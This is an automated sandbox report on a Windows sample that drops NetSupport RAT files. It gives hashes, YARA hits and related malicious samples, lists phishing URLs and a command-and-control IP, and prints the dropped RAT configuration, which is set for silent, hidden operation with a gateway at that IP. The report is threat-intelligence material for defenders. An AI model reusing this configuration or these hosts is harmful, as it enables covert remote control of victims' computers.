                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.netsupportschool.com/tutor-assistant.aspfile.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                              unknown
                                                              http://%s/fakeurl.htmbild.exe, bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                185.215.113.64
                                                                unknownPortugal
                                                                206894WHOLESALECONNECTIONSNLtrue
                                                                104.26.1.231
                                                                geo.netsupportsoftware.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1546920
                                                                Start date and time:2024-11-01 17:55:41 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 32s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:6
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:file.exe
                                                                Detection:MAL
                                                                Classification:mal88.rans.evad.winEXE@3/12@1/2
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 83%
                                                                • Number of executed functions: 214
                                                                • Number of non-executed functions: 152
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • VT rate limit hit for: file.exe
                                                                TimeTypeDescription
                                                                12:57:03API Interceptor11711874x Sleep call for process: bild.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                185.215.113.647IJCtxcnxS.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.64/hBugs2D/index.php
                                                                hKaIeSBB9k.exeGet hashmaliciousRedLine SmokeLoaderBrowse
                                                                • 185.215.113.64:8765/
                                                                bbN7lsCsNX.exeGet hashmaliciousRedLine SmokeLoaderBrowse
                                                                • 185.215.113.64:8765/
                                                                adtchpSE5J.exeGet hashmaliciousFicker Stealer RedLineBrowse
                                                                • 185.215.113.64:8765/
                                                                vVDSTekaDA.exeGet hashmaliciousRedLineBrowse
                                                                • 185.215.113.64:8765/
                                                                fnYVGiz0ji.exeGet hashmaliciousRedLine SmokeLoaderBrowse
                                                                • 185.215.113.64:8765/
                                                                dWpElvEjYN.exeGet hashmaliciousRedLineBrowse
                                                                • 185.215.113.64:8765/
                                                                ocuf85hPiS.exeGet hashmaliciousRedLineBrowse
                                                                • 185.215.113.64:8765/
                                                                PuM3Cgkt6s.exeGet hashmaliciousRedLine SmokeLoaderBrowse
                                                                • 185.215.113.64:8765/
                                                                104.26.1.231CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                update.jsGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                                • geo.netsupportsoftware.com/location/loca.asp
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                geo.netsupportsoftware.comCiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 172.67.68.212
                                                                CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 172.67.68.212
                                                                CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 172.67.68.212
                                                                CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 104.26.1.231
                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 104.26.1.231
                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 104.26.1.231
                                                                https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                • 172.67.68.212
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 172.67.68.212
                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.1.231
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 185.215.113.206
                                                                file.exeGet hashmaliciousStealcBrowse
                                                                • 185.215.113.206
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 185.215.113.16
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 185.215.113.206
                                                                ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                • 185.215.113.84
                                                                file.exeGet hashmaliciousStealcBrowse
                                                                • 185.215.113.206
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 185.215.113.206
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 185.215.113.206
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 185.215.113.206
                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.96.3
                                                                https://myabd.co.uk/main/arull.php?7080797967704b53693230746450544d6f737a6b6a4e533076544b7972566438774a38394d4841413d3d#EMAILBASE64#Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://otcengine3.valr.live/signInGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                https://u47872954.ct.sendgrid.net/ls/click?upn=u001.fn1BsYIkFXRWxBLF12AvXhKUqktmOI7EPkchHYpa8lb2yJr9vm47Biq1iwhYH4x0W6E6_1tlZTUgFpToOJRvXeJjZ1lQQtiPaV281MW3UjMlmRxOXQrHf3E28Ct8cWw3pFJv8ww35QVlHVAsV9LrE8WJ-2FqWVvVFyUxLS7XbjE4ioBaNzI7Y9AQvglzmjEqljOvLuB-2FqyLAOnwfIZ8a2UOhb0kq4DsltFbCSVl8L5tTVcXPovhejZuw7J5gFYEuhvfLU6jp9IiI6bOp4vutoVple794Svog7VmNTHCQykEIajsBwvsIA9xBhrTaUhPe3riTZOj5RQVgP8LolzHF5ds6ImaI4Q1KNsmEF06CineSoPu7BKGd-2B4IINKzojAY3yUTkdWQLuCwDcmh7vK-2Fm4MQ0xAiPJ-2BNim16FZPVrX44e4DFM1rc1r1ZYN2APdeEIThalu0Ag-2BNzl5TCF9-2F-2B4cIgV-2B8ceF573hvcKOOmdD1jbxRbFryn-2FGT77SPyR6cNo7joqYajHU5-2F1gyPof24NnmOIwvhn7qKr0Ihz3SIWFLubPXV0GdcG6guT-2FBjwN6h83YPSF-2F5Pk0uzrf9DG4ZRnISsjJaazqmdBRAAsyoWwP5iXWDQEfiJXubX9fD-2BREtQifDIoI36c8qvCy5hrOP9aAfzd2djtg-2B8gR7MvgWYCa5sA7wAgdCKrrNRjX7eeAtG5StCtmRi-2BsSO4PCFgsA4QlR8AVRyhdPdKhSYzgA-2F1BCyYmRsFeWn4YzRn0mexGeZM3PwhHAdqlfom16LJGSiVeG98p5ZK5N-2BZQuMTlINorxwlmSmaGarY5x7TUyztB-2Bv8L8gRhXdcDKSzxiMknwYCjp3XaQdwr-2Fp8kePQSl33tJvX1ITAiP7FBhlwoPgNxbRoTwVzl0I2Q2bE71pQB2jeSQldBukVcgJT-2BrmpKQA1GW5-2B59frk-3DGet hashmaliciousUnknownBrowse
                                                                • 172.66.40.133
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 172.64.41.3
                                                                https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNOWh47xHSpNswH5B20hFc1rkwm1HkocouB6puE-2FnM91Ea9xIyldie1eyHQvDQGF6-2F1OUGSCOg8K-2Fk8REDXGncryLNWAkNll9tI4svh29XngoJuJcvPHIwWw07juA1Lr687mlf_LZJN6rqeZVHTY7vi7TysfnSOWUsKUPL2t2FWuf1mHJZyRrnfnXk5in-2FtsLaVkEL4z-2F5H1v5rdZCMtKV4-2B7XswPaXSOX44YEil-2BgQ6f1-2BLxpcwnoVslshbeFD8-2FSkDYUL5gsTS7cnhi8iHs4T9b6wzPIbVlUAEwQAwoGeUFJH5x3RAGtspzpDyRWDwHNrMMOluLHeocJQAj7iS1dnS-2B-2Fhpf21Fjpr9lUosnkGJYIkfG0KNsjglBmf2yQvwZsg0Wp706kciqJgB5pqtemV1qFgZLIL2K-2BsyRLGqv3bbeqv6LWX-2Fbn97e4q8h4LdJzfXKTxRJD2tMgj2k7Ls1BdPjLturPdeJvpG2db-2FhwENpXetZR7k21gPz6in5zk7zhcmgIkZssf1WUkdDcjfwIeY2HuQe6EHwacpAnjlFSG7cGBDYbRKnbjWz72QvhesvDQrxGZA-2F-2FwuD5CryGFeRAazVMLU-2FTUgYuXTJzCzL6qav9lYxCC-2Bwx97sSjci4FffUtDhPcIZfKCP-2Ff9rufbc-2FOdTD6VLIHU5lNW4k8Nb-2FWedSu8kS9RXhRxjWAbV4qYK-2F68HLgFHbzOrm6M-2FG6a-2BnVs9TkK9ei8xVDo6cAhkQYCxDYOCBJJC-2BfLWulZgQ85hdg59312Kv6zX2g11nE5GRn-2B6U-2B2tuv67vEmY8CUatMt7UrQHEhVlrPnXi1EamUHW4AGpMQfKBj0GXRdJxG0fD3Zx-2FiIXcDEoi3GhoWLQTKZU-2FWlBKJiyqDLjDXS6qRg1X-2Fsd3R5k7fswdpYLTizSHt12T6-2Bo0IoKg0cyJsPKBfoK9Uleu7f9wgtdH4RtvaMbk9-2Buqhl6zW9NHZET-2BbGJHqyqlBeTSBtTZM6ltHEDZrojb0Lhszq-2BKoSCsuyjzgKAFmmWSRMGxwsXoHHuV8LoFEZjuiOSkTWEP-2FvQ0ZaWfqnp81VXTEktfVY9Xmx-2FaHq5NRH3vqpZc6LNkkSHnpJBPIYA83Mw-3D-3DGet hashmaliciousUnknownBrowse
                                                                • 162.159.61.3
                                                                https://messaging.webssites.click/validation.aspx?tab=eWFzaHlAYXZpYW53ZS5jb20=Get hashmaliciousUnknownBrowse
                                                                • 172.67.143.73
                                                                https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/mario.caligiuri@edmontonpolice.caGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\Public\Downloads\HTCTL32.DLLCiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                        Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                            https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                  C:\Users\Public\Downloads\PCICHEK.DLLCiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                        CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                            Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                              https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):328056
                                                                                                    Entropy (8bit):6.754723001562745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                    MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                    SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                    SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                    SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                    Malicious:false
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Downloads\HTCTL32.DLL, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                    • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                    • Filename: , Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):257
                                                                                                    Entropy (8bit):5.119720931145611
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                                    MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                                    SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                                    SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                                    SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18808
                                                                                                    Entropy (8bit):6.22028391196942
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                    MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                    SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                    SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                    SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                    Malicious:false
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Downloads\PCICHEK.DLL, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                    • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                    • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                    • Filename: , Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3735416
                                                                                                    Entropy (8bit):6.525042992590476
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                                    MD5:00587238D16012152C2E951A087F2CC9
                                                                                                    SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                                    SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                                    SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Downloads\PCICL32.DLL, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Downloads\PCICL32.DLL, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):396664
                                                                                                    Entropy (8bit):6.809064783360712
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                    MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                    SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                    SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                    SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Downloads\TCCTL32.DLL, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105848
                                                                                                    Entropy (8bit):4.68250265552195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                                    MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                    SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                                    SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                                    SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Downloads\bild.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):702
                                                                                                    Entropy (8bit):5.536854980364518
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:YTNWqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuh6IAlkz6:yWqzEmPZly6YBlLoG1fXXfDiU6IAaz6
                                                                                                    MD5:A4AA9219BECDEEC09159270BB041BB35
                                                                                                    SHA1:2D08305017EFB0A1FF7DEFDF66DB80191ED9CCF8
                                                                                                    SHA-256:277B9BCB5778CD5DC167ED75528818B06ED12F3FD427339F3085F4DB8A39ED2E
                                                                                                    SHA-512:4F7CE001DA009FCBA0C5BEAB572A16306D56FD91253C45D5196892142DA78EC805982A4E1C136AD61471B5A951697EED76F9EE63D8B94EB64024A11E0FD0DE42
                                                                                                    Malicious:false
                                                                                                    Preview:0x58095535....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=185.215.113.64:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):773968
                                                                                                    Entropy (8bit):6.901559811406837
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
